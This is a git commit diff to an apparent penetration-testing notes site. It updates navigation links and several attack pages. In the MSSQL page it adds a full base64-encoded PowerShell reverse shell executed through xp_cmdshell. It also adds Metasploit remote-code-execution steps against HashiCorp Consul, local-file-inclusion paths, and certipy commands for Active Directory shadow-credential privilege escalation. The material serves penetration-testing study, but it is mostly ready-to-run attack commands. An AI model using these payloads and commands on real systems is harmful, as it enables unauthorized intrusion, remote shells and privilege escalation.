updated

Author: hdks-bug

src/_components/footer.vto

@@ -39,20 +39,20 @@
                     {{ site.hermit.name }}
                 </a>
                 <a
-                    href="{{ site.ihunt.url }}"
+                    href="{{ site.lolgen.url }}"
                     target="_blank"
                     rel="noopener noreferrer"
                     class="hover:brightness-200"
                 >
-                    {{ site.ihunt.name }}
+                    {{ site.lolgen.name }}
                 </a>
                 <a
-                    href="{{ site.lolgen.url }}"
+                    href="{{ site.exploit_sensei.url }}"
                     target="_blank"
                     rel="noopener noreferrer"
                     class="hover:brightness-200"
                 >
-                    {{ site.lolgen.name }}
+                    {{ site.exploit_sensei.name }}
                 </a>
             </div>
         </div>

src/_components/header.vto

@@ -71,18 +71,18 @@
                         {{ site.hermit.name }}
                     </a>
                     <a
-                        href="{{ site.ihunt.url }}"
+                        href="{{ site.lolgen.url }}"
                         target="_blank"
                         rel="noopener noreferrer"
                     >
-                        {{ site.ihunt.name }}
+                        {{ site.lolgen.name }}
                     </a>
                     <a
-                        href="{{ site.lolgen.url }}"
+                        href="{{ site.exploit_sensei.url }}"
                         target="_blank"
                         rel="noopener noreferrer"
                     >
-                        {{ site.lolgen.name }}
+                        {{ site.exploit_sensei.name }}
                     </a>
                 </div>
             </div>

src/_components/navigation.vto

@@ -71,20 +71,20 @@
                     {{ site.hermit.name }}
                 </a>
                 <a
-                    href="{{ site.ihunt.url }}"
+                    href="{{ site.lolgen.url }}"
                     target="_blank"
                     rel="noopener noreferrer"
                     class="text-lg"
                 >
-                    {{ site.ihunt.name }}
+                    {{ site.lolgen.name }}
                 </a>
                 <a
-                    href="{{ site.lolgen.url }}"
+                    href="{{ site.exploit_sensei.url }}"
                     target="_blank"
                     rel="noopener noreferrer"
                     class="text-lg"
                 >
-                    {{ site.lolgen.name }}
+                    {{ site.exploit_sensei.name }}
                 </a>
             </div>
         </div>

src/_data/site.yml

@@ -21,11 +21,11 @@ hermit:
   name: Hermit C2
   url: https://github.com/hideckies/hermit
   desc: A command and control framework.
-ihunt:
-  name: ihunt
-  url: https://github.com/hideckies/ihunt
-  desc: Information gathering tool.
 lolgen:
   name: LOLGEN
   url: https://lolgen.hdks.org/
   desc: Living Off The Land Payload Generator.
+exploit_sensei:
+  name: Exploit Sensei
+  url: https://github.com/hideckies/exploit-sensei
+  desc: LLM-powered Exploitation Recommendation Tool.

src/exploit/database/mssql-pentesting.md

@@ -7,7 +7,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
     - https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16
-date: 2024-10-13
+date: 2025-03-15
 draft: false
 ---
 
@@ -133,13 +133,12 @@ EXEC xp_cmdshell 'whoami'
 
 ## Spawn a Windows Command Shell and Run Commands using Impacket
 
-If we connected MSSQL using **impacket**, we can exeucte the Windows Shell Commands by **"enable_xp_cmdshell"**.
+In MSSQL client, we can exeucte the Windows Shell Commands by `enable_xp_cmdshell` if the user has the permission.
 
 ### Enable/Disable a Windows Shell
 
 ```powershell
 > enable_xp_cmdshell
-> disable_xp_cmdshell
 
 # or
 
@@ -161,8 +160,12 @@ We can execute commands the same as Windows Command Prompt.
 ```powershell
 > xp_cmdshell whoami
 
-# Execute obfuscated commands.
+# Execute obfuscated PowerShel commands.
 > xp_cmdshell 'powershell -e <BASE64_PAYLOAD>'
+
+# Reverse Shell
+# Note: Replace the Base64 encoded payload with your own. See details: https://exploit-notes.hdks.org/exploit/shell/reverse-shell-cheat-sheet/#powershell
+> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMAAuADAALgAxACcALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
 ```
 
 <br />

src/exploit/dns/index.md

@@ -5,7 +5,7 @@ tags:
     - Privilege Escalation
     - Reconnaissance
 refs:
-date: 2024-08-11
+date: 2025-03-15
 draft: false
 ---
 
@@ -49,7 +49,7 @@ dnsenum --dnsserver <target-ip> --enum -p 0 -s 0 -f wordlist.txt example.com
 
 ```sh
 # ANY (all) record
-did example.com ANY
+dig example.com ANY
 dig example.com @<dns-ip> ANY
 dig example.com +nocmd +noall +answer ANY
 

src/exploit/web/hashicorp-consul-pentesting.md

@@ -5,10 +5,35 @@ tags:
     - Privilege Escalation
     - Web
 refs:
-date: 2022-12-10
+date: 2025-03-15
 draft: false
 ---
 
+## Interesting Files in Target System
+
+If we are in the target system, we can investigate the following files:
+
+```bash
+cat /etc/consul.d/config.json
+```
+
+## RCE
+
+Resource: [Pentester Academy Blog](https://blog.pentesteracademy.com/hashicorp-consul-remote-command-execution-via-services-api-d709f8ac3960)
+
+Using Metasploit, we may be able to execute command and get a reverse shell. Run the following commands in your local machine.
+
+```bash
+msfconsole
+msf> use exploit/multi/misc/consul_service_exec
+msf> set rhosts <target-ip>
+msf> set lhost <your-ip>
+msf> run
+# Session created...
+msf> shell # Spawn the shell
+whoami # Run command in the target system
+```
+
 ## Privilege Escalation
 
 If you have the ACL token (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx),  you may be able to privilege escalation.  

src/exploit/web/security-risk/file-inclusion.md

@@ -5,7 +5,7 @@ tags:
     - Web
 refs:
     - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
-date: 2025-01-30
+date: 2025-03-15
 draft: false
 ---
 
@@ -161,6 +161,8 @@ When our payload is successful, we can additionaly investigate local files and r
 ?page=/var/www/sudomain/index.php
 ?page=/var/www/subdomain.example.com/index.php
 ?page=/var/www/wordpress/index.php
+?page=/home/<username>/app/index.html
+?page=/home/<username>/webapp/index.html
 
 # Apache
 ?page=/etc/apache2/.htpasswd

src/exploit/windows/active-directory/shadow-credentials.md

@@ -7,7 +7,7 @@ tags:
     - Windows
 refs:
     - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
-date: 2025-03-13
+date: 2025-03-15
 draft: false
 ---
 
@@ -24,8 +24,11 @@ certipy shadow auto -u <user>@<target-ip> -hashes <nt-hash-of-user> -account <ta
 # 2. Update the target account's UPN (User Principal Name) to "administrator"
 certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> -user <target-user> -upn administrator
 
+# (Option) Find vulnerable template (check values for 'Template Name' and 'Certificate Authorities'. They will be used for the later commands)
+certipy find -u <ca>@<target-ip> -hashes <nthash-of-ca> -stdout -vulnerable
+
 # 3. Request a certificate for the target account using a vulnerable CA template
-certipy req -username <target-user>@<target-ip> -hashes <nt-hash-of-target-user> ca <ca> template <template>
+certipy req -u <target-user>@<target-ip> -hashes <nt-hash-of-target-user> -ca <ca> -template <template>
 
 # 4. Restore the target account's UPN to its original value
 certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> user <target-user> -upn <target-user>@<target-ip>